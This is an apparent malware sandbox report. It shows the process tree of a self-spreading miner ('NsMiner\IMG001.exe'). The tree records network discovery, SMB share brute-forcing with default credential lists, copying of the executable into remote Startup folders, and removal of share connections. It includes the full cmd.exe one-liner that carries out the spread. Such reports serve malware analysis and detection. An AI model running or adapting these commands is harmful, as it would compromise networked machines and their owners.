        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:7040
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:6644
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:6940
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\1\IMG001.exe" "
        6⤵
        
        PID:2372
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\IMG001.exe"
        7⤵
        
        PID:1808
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users /delete /y
        6⤵
        Indicator Removal: Network Share Connection Removal
        
        PID:7176
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 20 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:7552
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:7192
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "1" /user:"1"
        6⤵
        
        PID:5540
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "1" /user:"1"
        6⤵
        
        PID:7776
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5732
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "123" /user:"1"
        6⤵
        
        PID:6492
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "123" /user:"1"
        6⤵
        
        PID:6784
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:6852
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "1" /user:"1"
        6⤵
        
        PID:3348
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "1" /user:"1"
        6⤵
        
        PID:1696
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:7876
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "1808" /user:"1"
        6⤵
        
        PID:7060
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "1808" /user:"1"
        6⤵
        
        PID:5596
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:5172
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ """" /user:"1"
        6⤵
        
        PID:2252
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users """" /user:"1"
        6⤵
        
        PID:3192
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3824
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "0" /user:"10.127.0.1"
        6⤵
        
        PID:3336
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "0" /user:"10.127.0.1"
        6⤵
        
        PID:4456
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2948
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "1" /user:"10.127.0.1"
        6⤵
        
        PID:7596
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "1" /user:"10.127.0.1"
        6⤵
        
        PID:2548
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:5788
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "123" /user:"10.127.0.1"
        6⤵
        
        PID:3312
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "123" /user:"10.127.0.1"
        6⤵
        
        PID:1456
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:6300
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "10.127.0.1" /user:"10.127.0.1"
        6⤵
        
        PID:4092
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "10.127.0.1" /user:"10.127.0.1"
        6⤵
        
        PID:4988
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:2892
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "1808" /user:"10.127.0.1"
        6⤵
        
        PID:7708
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "1808" /user:"10.127.0.1"
        6⤵
        
        PID:8012
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:6204
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ """" /user:"10.127.0.1"
        6⤵
        
        PID:1564
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users """" /user:"10.127.0.1"
        6⤵
        
        PID:5496
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5088
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "0" /user:"administrator"
        6⤵
        
        PID:1616
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "0" /user:"administrator"
        6⤵
        
        PID:6976
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        Runs ping.exe
        
        PID:2416
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "1" /user:"administrator"
        6⤵
        
        PID:968
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "1" /user:"administrator"
        6⤵
        
        PID:6452
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:6040
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "123" /user:"administrator"
        6⤵
        
        PID:7216
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "123" /user:"administrator"
        6⤵
        
        PID:6592
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        Runs ping.exe
        
        PID:852
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "administrator" /user:"administrator"
        6⤵
        
        PID:7256
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "administrator" /user:"administrator"
        6⤵
        
        PID:660
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:7428
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "1808" /user:"administrator"
        6⤵
        
        PID:5664
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "1808" /user:"administrator"
        6⤵
        
        PID:3212
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:6412
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ """" /user:"administrator"
        6⤵
        
        PID:6176
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users """" /user:"administrator"
        6⤵
        
        PID:3784
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:5048
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "0" /user:"user"
        6⤵
        
        PID:6216
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "0" /user:"user"
        6⤵
        
        PID:5608
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:2268
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "1" /user:"user"
        6⤵
        
        PID:2916
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "1" /user:"user"
        6⤵
        
        PID:5104
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        Runs ping.exe
        
        PID:5504
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "123" /user:"user"
        6⤵
        
        PID:7088
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "123" /user:"user"
        6⤵
        
        PID:4680
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        Runs ping.exe
        
        PID:7948
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "user" /user:"user"
        6⤵
        
        PID:7904
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "user" /user:"user"
        6⤵
        
        PID:1712
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        Runs ping.exe
        
        PID:8092
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "1808" /user:"user"
        6⤵
        
        PID:4808
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "1808" /user:"user"
        6⤵
        
        PID:968
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        Runs ping.exe
        
        PID:5432
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ """" /user:"user"
        6⤵
        
        PID:3420
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users """" /user:"user"
        6⤵
        
        PID:7096
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1472
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "0" /user:"admin"
        6⤵
        
        PID:7952
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "0" /user:"admin"
        6⤵
        
        PID:6680
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1316
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "1" /user:"admin"
        6⤵
        
        PID:4968
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "1" /user:"admin"
        6⤵
        
        PID:8172
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:6192
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "123" /user:"admin"
        6⤵
        
        PID:5080
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "123" /user:"admin"
        6⤵
        
        PID:4932
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2028
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "admin" /user:"admin"
        6⤵
        
        PID:3204
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "admin" /user:"admin"
        6⤵
        
        PID:8024
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        Runs ping.exe
        
        PID:2452
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "1808" /user:"admin"
        6⤵
        
        PID:7500
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "1808" /user:"admin"
        6⤵
        
        PID:6172
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5224
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ """" /user:"admin"
        6⤵
        
        PID:1632
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users """" /user:"admin"
        6⤵
        
        PID:4632
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:4120
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "0" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:3192
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "0" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:3124
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:4812
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "1" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:1664
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "1" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:6744
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:1632
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "123" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:4692
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "123" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:3604
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5532
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "àäìèíèñòðàòîð" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:6528
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "àäìèíèñòðàòîð" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:7796
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:3468
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ "1808" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:1624
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users "1808" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:3044
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:2860
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\C$ """" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:4092
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.0.1\Users """" /user:"àäìèíèñòðàòîð"
        6⤵
        
        PID:8024
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=1703& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))
        5⤵
        Indicator Removal: Network Share Connection Removal
        
        PID:8184
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c @net view|find /i "\\" || @arp -a|find /i " 1"
        6⤵
        Network Service Discovery
        
        PID:8084
        
        C:\Windows\SysWOW64\net.exe
        
        net view
        7⤵
        Discovers systems in the same network
        
        PID:1448
        
        C:\Windows\SysWOW64\find.exe
        
        find /i "\\"
        7⤵
        
        PID:1564
        
        C:\Windows\SysWOW64\ARP.EXE
        
        arp -a
        7⤵
        Network Service Discovery
        
        PID:2204
        
        C:\Windows\SysWOW64\find.exe
        
        find /i " 1"
        7⤵
        
        PID:7620
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c set str_
        6⤵
        
        PID:7344
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net view \\10.127.255.255|find /i " "
        6⤵
        
        PID:2064
        
        C:\Windows\SysWOW64\net.exe
        
        net view \\10.127.255.255
        7⤵
        Discovers systems in the same network
        
        PID:5168
        
        C:\Windows\SysWOW64\find.exe
        
        find /i " "
        7⤵
        
        PID:5184
      - C:\Windows\SysWOW64\net.exe
        
        net use * /delete /y
        6⤵
        Indicator Removal: Network Share Connection Removal
        
        PID:2300
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 localhost
        6⤵
        
        PID:3788
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7616
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:4356
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:8136
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7732
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:976
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:7328
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:4548
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:6864
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:3972
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:1200
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:7096
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:6752
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7156
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:328
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:2184
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:4980
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:6964
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:3028
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7716
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:4904
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:5536
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:7792
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "
        6⤵
        
        PID:1072
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"
        7⤵
        
        PID:2204
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:5300
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "
        6⤵
        
        PID:7140
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"
        7⤵
        
        PID:5112
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:5016
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:4464
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:6932
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:5940
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "
        6⤵
        
        PID:684
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"
        7⤵
        
        PID:8092
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo f"
        6⤵
        
        PID:648
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\1\IMG001.exe" "
        6⤵
        
        PID:3032
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\IMG001.exe"
        7⤵
        
        PID:7932
      - C:\Windows\SysWOW64\net.exe
        
        net use \\10.127.255.255\C$ /delete /y
        6⤵
